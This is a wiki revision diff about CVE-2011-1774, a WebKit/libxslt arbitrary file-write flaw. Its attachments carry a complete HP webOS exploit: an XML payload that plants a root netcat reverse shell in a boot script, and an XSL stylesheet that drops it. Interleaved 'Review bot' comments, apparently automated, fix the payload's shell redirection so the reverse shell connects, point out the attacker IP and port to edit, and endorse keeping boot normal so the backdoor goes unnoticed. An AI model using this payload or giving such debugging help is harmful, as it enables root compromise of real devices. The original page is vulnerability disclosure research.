Changes for page Application_Webkit

Last modified by Nicolas Gregoire on 2012/01/14 17:48

From version 18.1
edited by Nicolas Gregoire
on 2012/01/14 17:48
Change comment: There is no comment for this version
To version 4.1
edited by Nicolas Gregoire
on 2012/01/13 23:56
Change comment: There is no comment for this version

Summary

Details

Page properties
Tags
... ... @@ -1,1 +1,0 @@
1 -webkit|libxslt|metasploit|webOS|Apple|Safari|iPhone|iPad|exploit
Content
... ... @@ -1,10 +5,6 @@
1 -{{toc/}}
2 -
3 -= Introduction =
4 -
5 5  Dixit [[Wikipedia>>http://en.wikipedia.org/wiki/Webkit||rel="__blank"]] : "//WebKit is a layout engine designed to allow web browsers to render web pages. WebKit powers Google Chrome and Apple Safari that by December 2011 held 33.35% of the browser market share between them (according to StatCounter). It is also used as the basis for the experimental browser included with the Amazon Kindle ebook reader, as well as the default browser in the iOS, Android and webOS mobile operating systems."//
6 6  
7 -= Applications =
3 +== Applications ==
8 8  
9 9  Webkit is used as the rendering engine of numerous browsers :
10 10  
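Review bot: style point on the context line 5 of this hunk: "Dixit [[Wikipedia>>...]]" is Latin shorthand that reads oddly on an English page; "Quoting Wikipedia" is clearer. The quoted 33.35% StatCounter figure is a snapshot "by December 2011" and will go stale, so either mark it as a dated figure or link the StatCounter source directly rather than the Wikipedia article.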
... ... @@ -25,31 +25,21 @@
25 25  * Valve Steam : untested
26 26  * and much more ...
27 27  
28 -= File creation vulnerability =
24 +== File creation vulnerability ==
29 29  
30 30  Webkit uses [[libxslt>>Engine_libxslt]] as its XSLT engine. Old versions were not restricting __write__ access by the engine to the file system, leading to a remotely exploitable vulnerability ([[CVE-2011-1774>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774||rel="__blank"]]). This was patched in [[Changeset 79159>>http://trac.webkit.org/changeset/79159||rel="__blank"]] by adding appropriate calls to xsltSetSecurityPrefs().
31 31  
32 32  
33 -PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability :
29 +PoC included on the [[libxslt>>Engine_libxslt]] page demonstrate the vulnerability.
34 34  
35 -[[image:macos-tmp-owned.png||style="display: block; margin-left: auto; margin-right: auto"]]
31 +== Exploits ==
36 36  
37 -
38 -
39 -[[image:ipad-tmp-owned.png||style="display: block; margin-left: auto; margin-right: auto"]]
40 -
41 -= Metasploit =
42 -
43 43  Two modules are included in Metasploit :
44 44  
45 45  * a [[auxiliary>>http://www.metasploit.com/modules/auxiliary/server/webkit_xslt_dropper||rel="__blank"]] working on any non-sandboxed non-patched Webkit device
46 46  * an [[exploit>>http://www.metasploit.com/modules/exploit/windows/browser/safari_xslt_output||rel="__blank"]] plugin targeting Safari users with Admin privileges (because of the MOF trick)
47 47  
48 -= HP webOS 3.x =
38 +An exploit for HP webOS is attached. This exploit drops a backdoor executed with root privileges at boot time :
49 49  
50 -An exploit for HP webOS 3.x was developed. This exploit drops a backdoor which is later executed with root privileges at boot time. The exploit is composed of two files :
51 -
52 -* [[webos-root-backdoor.xml>>attach:webos-root-backdoor.xml]] contains the configurable data (name and content of the destination file) and a processing instruction triggering the XSLT code
53 -* [[webos-root-backdoor.xsl>>attach:webos-root-backdoor.xsl]] reads the XML file and create the requested file on disk. This version overwrites a script located in /etc/default/ with a version including a reverse-shell based on netcat
54 -
55 -Browsing the XML file from a vulnerable device is enough to trigger the exploit. This was patched during the 3.0.2 OTA update.
40 +* XML contains the payload : destination file name + file content. A reverse-shell based on netcat is added to the script
41 +* XSL reads the XML file and create the requested file on disk
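Review bot: the "+" side of this hunk (line 38) states "An exploit for HP webOS is attached", but the attachment sections further down show webos-root-backdoor.xml and webos-root-backdoor.xsl only on the "-" side of this comparison, so that revision refers to files it does not carry; the "-" side (lines 52-53) fixes this by naming both attachments and is the one to keep. Note that this comparison runs from the newer version 18.1 to the older 4.1, so the "-" lines are the current text. Two smaller points on the "-" text: line 46's "(because of the MOF trick)" needs one clause of explanation, namely that the Metasploit exploit drops a .mof file into the WMI directory under the system root, which only an administrator can write to, hence the Admin requirement; and line 53 should read "creates the requested file on disk".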
ipad-tmp-owned.png
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -11.9 KB
Content
macos-tmp-owned.png
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -12.4 KB
Content
webos-root-backdoor.xml
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -1.7 KB
Content
... ... @@ -1,54 +1,0 @@
1 -<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2 -<?xml-stylesheet type="text/xsl" href="webos-root-backdoor.xsl"?>
3 -<exploit><location>/etc/default/mount_checks</location><content><![CDATA[# -*- mode: conf; -*-
4 -
5 -# Backdoor, by Nicolas Gregoire / Agarri
6 -IP="192.168.2.89"
7 -PORT="4444"
8 -
9 -MKNOD="/bin/mknod"
10 -NC="/usr/bin/nc"
11 -FIFO="/tmp/.a"
12 -
13 -( $MKNOD $FIFO p; while true; do { sleep 1; $NC $IP $PORT < $FIFO | /bin/sh &> $FIFO ; } done ; rm $FIFO ) &
14 -# End backdoor
15 -
16 -
17 -# Set this to save a file across reboots to indictate on boot that
18 -# umount happened correctly (and that, e.g. battery wasn't pulled)
19 -MOUNT_STAMP=/var/umount.stamp
20 -# tags used in MOUNT_STAMP
21 -REASON_MARK=reason
22 -CLEAN_UMOUNT_MARK=date
23 -
24 -# name of system property holding true/false based on presence of
25 -# $MOUNT_STAMP. Ignored if MOUNT_STAMP not set; must be defined
26 -# otherwise
27 -MOUNT_PROPERTY=last_umount_clean
28 -
29 -# file that contains 1 if / should be remounted rw, 0 otherwise
30 -REMOUNT_TOKEN="/etc/.rootfs_RW"
31 -
32 -# If an fsck or reformat of /media/internal was required on boot, set
33 -# this property.
34 -MEDIA_FIX_PROPERTY=media_fixed_how
35 -
36 -WIPE_FLAGS_DIR=/var/.flags
37 -WIPE_FLAGS_FILE=$WIPE_FLAGS_DIR/on_mount
38 -WIPE_PROGRESS=/var/.sought_blocks
39 -
40 -# MMC_PROTECT_OPTS=-f
41 -MMC_PROTECT_OPTS=""
42 -MMC_PROTECT_DISABLED=1
43 -mmc_boot_update() {
44 - if which mmc_protect >/dev/null && test -z "$MMC_PROTECT_DISABLED" ; then
45 - BOOT_DEV=$(sed 's,.*root=\(/dev/[^ ]*\) .*,\1,' < /proc/cmdline)
46 - ON_OFF=1 # on by default
47 - if [ -f "$REMOUNT_TOKEN" -a "$(cat $REMOUNT_TOKEN)" = "1" ]; then
48 - ON_OFF=0
49 - fi
50 - mmc_protect $MMC_PROTECT_OPTS -D "$BOOT_DEV" -p $ON_OFF
51 - fi
52 -}
53 -]]></content></exploit>
54 -
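Review bot: portability problem on line 13 of the dropped payload: `$NC $IP $PORT < $FIFO | /bin/sh &> $FIFO` uses the bash-only `&>` redirection. If /etc/default/mount_checks is sourced by a POSIX sh without bash extensions, `&>` is parsed as `&` followed by `>`, so /bin/sh is backgrounded with its output still attached to the terminal and the shell's stdout never reaches the FIFO, which silently breaks the reverse shell; `/bin/sh > $FIFO 2>&1` works in every Bourne-style shell. Two minor points: the trailing `rm $FIFO` after `while true` is unreachable, and IP="192.168.2.89" / PORT="4444" on lines 6-7 are lab values that must be edited before use. Keeping the original mount_checks content after the backdoor block (lines 17-52) is the right call, since the overwritten file still has to define MOUNT_STAMP and mmc_boot_update() for boot to proceed normally.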
webos-root-backdoor.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -816 bytes
Content
... ... @@ -1,17 +1,0 @@
1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
2 - <!-- Of course, the webOS browser runs as 'root' ;-) -->
3 - <xsl:template match="/">
4 - <!-- Grab some values from the XML file -->
5 - <xsl:variable name="content" select="//content/text()"/>
6 - <xsl:variable name="location" select="//location/text()"/>
7 - <html><body>
8 - <!-- Drop the backdoor, overwriting the previous configuration file -->
9 - <xsl:document href="{$location}" method="text"><xsl:copy-of select="$content"/></xsl:document>
10 - <!-- Display something to the user -->
11 - File '<xsl:copy-of select="$location"/>' has been overwritten ...<br/>
12 - <!-- Ask for a reboot. We could force it too ... -->
13 - Now reboot and wait for your reverse-shell ;-)<br/>
14 - </body></html>
15 - </xsl:template>
16 -</xsl:stylesheet>
17 -
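Review bot: the message on line 11, "File '...' has been overwritten ...", is emitted unconditionally. XSLT 1.0 gives the stylesheet no way to observe whether `xsl:document` actually wrote the file, so on a patched WebKit (where xsltSetSecurityPrefs() denies file writes) or under a non-root browser the page still claims success; wording it as an attempt ("tried to overwrite") would avoid misleading the operator. A documentation point for line 9: `xsl:document` comes from the XSLT 1.1 working draft, not XSLT 1.0, and works here only because libxslt implements it in the XSLT namespace; the absolute path in `href="{$location}"` is required, since a relative href would resolve against the stylesheet's base URI. The comment on line 2 carries the exploit's key precondition (the webOS browser runs as root) and should be restated in the page text rather than left only in the attachment.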